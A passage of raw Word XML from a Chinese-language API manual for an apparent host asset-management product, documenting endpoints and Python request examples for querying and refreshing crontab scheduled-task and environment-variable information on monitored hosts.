          <w:p w14:paraId="30237F0D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CCDE200" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行周期</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3EB8915A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="520A16BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>execPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6816B4B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A1F8D79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37832F41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行命令或脚本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1C8564BD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49AD0123" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D117495" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71B23BF0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DB24EC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>配置文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="34DBD75C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="447679D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="102CABAF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CC3211B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04D9DC0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="665CFCDD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70E1A8D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C16C700" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30DD19C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D31B0EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0FE2936D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="185D8DCB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5815609D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="472845E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F0E3A61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="14CF59EE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="023E7D91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>crondOpen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3263C34C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3848071D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E45BF79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>启用状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71B9B22F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>linux计划任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF5B426" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>def task_linux():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/task/linux?user=root&amp;execPath=/usr/sbin/raid-check&amp;conf=/etc/cron.d/raid-check&amp;taskTime=2017-01-25%%2000:00:00%%20-%%202017-01-27%%2000:00:00&amp;taskType=CRONTAB" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'user': 'root', 'execPath': '/usr/sbin/raid-check', 'conf': '/etc/cron.d/raid-check', 'taskTime': '2017-01-25 00:00:00 - 2017-01-27 00:00:00', 'taskType': 'CRONTAB'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("GET", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D1868" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>对于签名的部分，有疑问可以参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="身份认证">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>身份认证</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:hyperlink w:anchor="请求签名">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>请求签名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>，对于完整的模拟请求参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="启动项信息查询结果">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>启动项信息查询结果</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>的windows代码示例(python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E1856" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="计划任务信息扫描"/>
      <w:bookmarkEnd w:id="61"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>计划任务信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A86AD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求计划任务信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F16AA05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13855058" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/task/{linux}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C68013A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D04164A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D7F769" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583B71E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/task/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8C8C71" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F4C4BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2C398A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A8236C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent",//      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A63BA3B"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3BCDA1A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EEC34A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76AD1F51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A97643A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CED045F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="03A94A1A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ABF6825" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C0B4388" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="572AAE6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B721C02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="108C84F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>linux计划任务信息扫描更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D5B013" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>def refresh():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/task/linux/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("POST", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D0B986" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="计划任务信息查询扫描状态"/>
      <w:bookmarkEnd w:id="62"/>
      <w:r>
        <w:t>计划任务信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0369FD76" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询计划任务信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142D38B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="环境变量信息"/>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkEnd w:id="63"/>
      <w:r>
        <w:t>环境变量信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E480D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2FAE31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于查询资产中的环境变量信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223A71D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372DBEAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>环境变量信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F841C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFFFD60" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA851C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D55E32E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>环境变量信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F95C23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>环境变量信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13509172" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>环境变量信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E87704" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352A9B90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用环境变量信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9EA540"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67365C18" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B77E860" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="环境变量信息查询结果"/>
      <w:r>
        <w:t>环境变量信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321A74AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询环境变量信息，按每台主机每个环境变量进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFB0DD4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294E56F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/assets/env/{linux}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6ABFC8"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173"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="2110"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3FA98AE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34C4023" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F454871" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FF90D0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1076FBE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7184CD02" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66439C08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AC5DB5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="237D4D50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="190BB754" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1E9F236C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EB9A81C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
